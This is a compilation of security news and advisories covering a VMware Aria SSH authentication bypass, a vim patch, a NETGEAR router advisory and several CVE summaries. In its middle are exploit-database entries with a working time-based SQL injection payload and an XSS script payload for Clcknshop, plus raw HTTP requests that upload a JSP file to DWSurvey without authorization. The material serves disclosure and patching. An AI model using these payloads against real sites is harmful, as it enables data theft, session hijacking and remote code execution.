Proof-of-concept (PoC) exploit code has been made available for a recently disclosed and patched critical flaw impacting VMware Aria Operations for Networks (formerly vRealize Network Insight).
The flaw, tracked as CVE-2023-34039, is rated 9.8 out of a maximum of 10 for severity and has been described as a case of authentication bypass due to a lack of unique cryptographic key generation.
“A

Network Security / Vulnerability

Proof-of-concept (PoC) exploit code has been made available for a recently disclosed and patched critical flaw impacting VMware Aria Operations for Networks (formerly vRealize Network Insight).

The flaw, tracked as CVE-2023-34039, is rated 9.8 out of a maximum of 10 for severity and has been described as a case of authentication bypass due to a lack of unique cryptographic key generation.

"A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI," VMware said earlier this week.

Summoning Team's Sina Kheirkhah, who published the PoC following an analyzing the patch by VMware, said the root cause can be traced back to a bash script containing a method named refresh\_ssh\_keys(), which is responsible for overwriting the current SSH keys for the support and ubuntu users in the authorized\_keys file.

"There is SSH authentication in place; however, VMware forgot to regenerate the keys," Kheirkhah said. "VMware's Aria Operations for Networks had hard-coded its keys from version 6.0 to 6.10."

VMware's latest fixes also address CVE-2023-20890, an arbitrary file write vulnerability impacting Aria Operations for Networks that could be abused by an adversary with administrative access to write files to arbitrary locations and achieve remote code execution.

In other words, a threat actor could leverage the PoC to obtain admin access to the device and exploit CVE-2023-20890 to run arbitrary payloads, making it crucial that users apply the updates to secure against potential threats.

The release of the PoC coincides with the virtualization technology giant issuing fixes for an high-severity SAML token signature bypass flaw (CVE-2023-20900, CVSS score: 7.5) across several Windows and Linux versions of VMware Tools.

"A malicious actor with man-in-the-middle (MITM) network positioning in the virtual machine network may be able to bypass SAML token signature verification, to perform VMware Tools Guest Operations," the company said in an advisory released Thursday.

Peter Stöckli of GitHub Security Lab has been credited with reporting the flaw, which affects the following versions -

*   VMware Tools for Windows (12.x.x, 11.x.x, 10.3.x) - Fixed in 12.3.0
*   VMware Tools for Linux (10.3.x) - Fixed in 10.3.26
*   Open-source implementation of VMware Tools for Linux or open-vm-tools (12.x.x, 11.x.x, 10.3.x) - Fixed in 12.3.0 (to be distributed by Linux vendors)

The development also comes as Fortinet FortiGuard Labs warned of continued exploitation of Adobe ColdFusion Vulnerabilities by threat actors to deploy cryptocurrency miners and hybrid bots such as Satan DDoS (aka Lucifer) and RudeMiner (aka SpreadMiner) that are capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks.

Also deployed is a backdoor named BillGates (aka Setag), which is known for hijacking systems, stealing sensitive information, and initiating DDoS attacks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

PoC Exploit Released for Critical VMware Aria's SSH Auth Bypass Vulnerability

Untrusted Search Path in GitHub repository vim/vim prior to 9.0.1833.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

patch 9.0.1833: \[security\] runtime file fixes

Problem:  runtime files may execute code in current dir
Solution: only execute, if not run from current directory

The perl, zig and ruby filetype plugins and the zip and gzip autoload
plugins may try to load malicious executable files from the current
working directory.  This is especially a problem on windows, where the
current directory is implicitly in your $PATH and windows may even run a
file with the extension \`.bat\` because of $PATHEXT.

So make sure that we are not trying to execute a file from the current
directory. If this would be the case, error out (for the zip and gzip)
plugins or silently do not run those commands (for the ftplugins).

This assumes, that only the current working directory is bad. For all
other directories, it is assumed that those directories were
intentionally set to the $PATH by the user.

Signed-off-by: Christian Brabandt <cb@256bit.org>

*   Loading branch information

CVE-2023-4736: patch 9.0.1833: [security] runtime file fixes · vim/vim@816fbcc

Microsoft Windows Kernel renaming layered keys does not reference count security descriptors, leading to a use-after-free condition.

Microsoft Windows Kernel Use-After-Free

PlayTube version 3.0.1 suffers from an information leakage vulnerability.

    # Exploit Title: PlayTube 3.0.1 - Redirect Information Disclosure# Exploit Author: CraCkEr# Date: 19/08/2023# Vendor: PlayTube# Vendor Homepage: https://playtubescript.com/# Software Link: https://demo.playtubescript.com/# Tested on: Windows 10 Pro# Impact: Sensitive Information Leakage# CVE: CVE-2023-4714# CWE: CWE-200 - CWE-284 - CWE-266## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionInformation disclosure issue in the redirect responses, When accessing any page on the website,Sensitive data, such as app IDs, is being exposed in the body of these redirects.## Steps to Reproduce:When you visit most of pages on the website, such as the index page for example:https://website/in the body page response there's information leakage for "RazorPay Payment" id KEY+--------------------------------------+razorpay_options = {          key: "rzp_test_ruz***********"+--------------------------------------+Note: The same information leaked, for the app ID KEY, was added to the "Payment Configuration" in the Administration PanelSettings of "Payment Configuration" in the Administration Panel, on this Path:https://website/admin-cp/payment-settings[-] Done

PlayTube 3.0.1 Information Disclosure

Clcknshop version 1.0.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Clcknshop 1.0.0 - SQL Injection# Exploit Author: CraCkEr# Date: 16/08/2023# Vendor: Infosoftbd Solutions# Vendor Homepage: https://infosoftbd.com/# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/# Demo: https://kidszone.clckn.shop/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4708# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /collection/allGET parameter 'tag' is vulnerable to SQL Injectionhttps://website/collection/all?tag=[SQLi]---Parameter: tag (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z---[-] Done

Clcknshop 1.0.0 SQL Injection

Clcknshop version 1.0.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Clcknshop 1.0.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/08/2023# Vendor: Infosoftbd Solutions# Vendor Homepage: https://infosoftbd.com/# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/# Demo: https://kidszone.clckn.shop/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4707# CWE: CWE-79 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /collection/allGET parameter 'q' is vulnerable to XSShttps://website/collection/all?q=[XSS]XSS Payloads:jkhrt<script>alert(1)</script>ccnsi[-] Done

Clcknshop 1.0.0 Cross Site Scripting

SQL Injection vulnerability in Chamilo LMS v.1.11 thru v.1.11.20 allows a remote privileged attacker to obtain sensitive information via the import sessions functions.

CVE-2023-39582: Security issues - Chamilo LMS

File Upload vulnerability in DWSurvey DWSurvey-OSS v.3.2.0 and before allows a remote attacker to execute arbitrary code via the saveimage method and savveFile in the action/UploadAction.java file.

\`\`The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution

  
\`POST /diaowen/up/upload!saveimage.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0  
Connection: close  
Content-Length: 395  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`  
  

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution

  
\`POST /diaowen/up/upload!saveFile.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0  
Connection: close  
Content-Length: 489  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="basepath"

files  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`

CVE-2023-40980: Arbitrary file uploads exist · Issue #107 · wkeyuan/DWSurvey

Buffer Overflow vulnerability in NETGEAR R6400v2 before version 1.0.4.118, allows remote unauthenticated attackers to execute arbitrary code via crafted URL to httpd.

Was this article helpful?   Yes     No

Associated CVE IDs: None

First published: 2023-03-15

NETGEAR has released fixes for a pre-authentication buffer overflow security vulnerability on the following product models:

*   CBR40 fixed in firmware version 2.5.0.24
*   LAX20 fixed in firmware version 1.1.6.34
*   MK62 fixed in firmware version 1.1.6.122
*   MR60 fixed in firmware version 1.1.6.122
*   MS60 fixed in firmware version 1.1.6.122
*   RBW30 fixed in firmware version 2.6.2.6
*   R6400 fixed in firmware version 1.0.1.70
*   R6400v2 fixed in firmware version 1.0.4.118
*   R6700v3 fixed in firmware version 1.0.4.118
*   R7000 fixed in firmware version 1.0.11.130
*   R7000P fixed in firmware version 1.3.3.148
*   RAX200 fixed in firmware version 1.0.4.120
*   RAX75 fixed in firmware version 1.0.4.120
*   RAX80 fixed in firmware version 1.0.4.120
*   RS400 fixed in firmware version 1.5.1.86

NETGEAR strongly recommends that you download the latest firmware as soon as possible.

**To download the latest firmware for your NETGEAR product:**

1.  Visit NETGEAR Support.
2.  Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears.  
    If you do not see a drop-down menu, make sure that you entered your model number correctly, or select a product category to browse for your product model.
3.  Click **Downloads**.
4.  Under **Current Versions**, select the download whose title begins with **Firmware Version**.
5.  Click **Download**.
6.  Follow the instructions in your product’s user manual, firmware release notes, or product support page to install the new firmware.

****Disclaimer****

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information in the document or materials linked from the document is at your own risk. NETGEAR reserves the right to change or update this document at any time. NETGEAR expects to update this document as new information becomes available.

The pre-authentication buffer overflow vulnerability remains if you do not complete all recommended steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification.

****Acknowledgements****

Swings from Chaitin Security Research Lab

****Common Vulnerability Scoring System****

CVSS Rating: Medium

CVSS Score: 6.5

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

****Best Practices for Updating Firmware****

We recommend that you keep your NETGEAR devices up to date with the latest firmware. Firmware updates contain security fixes, bug fixes, and new features for your NETGEAR products.

If your product is supported by one of our apps, using the app is the easiest way to update your firmware:

*   Orbi products: NETGEAR Orbi app
*   NETGEAR WiFi routers: NETGEAR Nighthawk app
*   Some NETGEAR Business products: NETGEAR Insight app (firmware updates through the app are available only for Insight subscribers)

If your product is not supported by one of our apps, you can always update your firmware manually by following the instructions in your product’s user manual, firmware release notes, or product support page. For more information, see Where can I find information about my NETGEAR product?.

****Contact****

We appreciate and value having security concerns brought to our attention. NETGEAR constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.

It is NETGEAR's mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.

To report a security vulnerability, visit http://www.netgear.com/about/security/. 

If you are a NETGEAR customer with a security-related support concern, you can contact NETGEAR customer support at techsupport.security@netgear.com. 

****Revision History****

2023-03-15: Published advisory

2023-06-15: Updated Acknowledgements section

Last Updated:06/15/2023 | Article ID: 000065571

**Was this article helpful?**Yes No

**This article applies to:**

*   Wireless AX Router Nighthawk (WiFi 6) (3)
    *   RAX200
    *   RAX75
    *   RAX80
*   Nighthawk WiFi Systems (3)
    *   MK62
    *   MR60
    *   MS60
*   Wireless AC Router Nighthawk (4)
    *   R6700v3
    *   R7000
    *   R7000P
    *   RS400
*   Mobile Router (1)
    *   LAX20
*   Wireless AC Router (2)
    *   R6400
    *   R6400v2
*   Orbi (2)
    *   CBR40
    *   RBW30

How to Find Your Model Number  
**Read this article in another language:**

**Looking for more about your product?**

Get information, documentation, videos and more for your specific product.

**Need to Contact NETGEAR Support?**

With NETGEAR’s round-the-clock premium support, help is just a phone call away.

**Complimentary Support**

NETGEAR provides complimentary technical support for NETGEAR products for 90 days from the original date of purchase.

Contact Support

**NETGEAR Premium Support**

**GearHead Support for Home Users**

GearHead Support is a technical support service for NETGEAR devices and all other connected devices in your home. Advanced remote support tools are used to fix issues on any of your devices. The service includes support for the following:

*   Desktop and Notebook PCs, Wired and Wireless Routers, Modems, Printers, Scanners, Fax Machines, USB devices and Sound Cards
*   Windows Operating Systems (2000, XP or Vista), MS Word, Excel, PowerPoint, Outlook and Adobe Acrobat
*   Anti-virus and Anti-Spyware: McAfee, Norton, AVG, eTrust and BitDefender

Learn More

**ProSUPPORT Services for Business Users**

NETGEAR ProSUPPORT services are available to supplement your technical support and warranty entitlements. NETGEAR offers a variety of ProSUPPORT services that allow you to access NETGEAR's expertise in a way that best meets your needs:

*   Product Installation
*   Professional Wireless Site Survey
*   Defective Drive Retention (DDR) Service

Learn More

CVE-2023-36187: Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2020-0578

An authorization/sensitive information disclosure vulnerability was identified in GitHub Enterprise Server that allowed a fork to retain read access to an upstream repository after its visibility was changed to private. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.10.0 and was fixed in versions 3.9.4, 3.8.9, 3.7.16 and 3.6.18. This vulnerability was reported via the GitHub Bug Bounty program.


Tag

#windows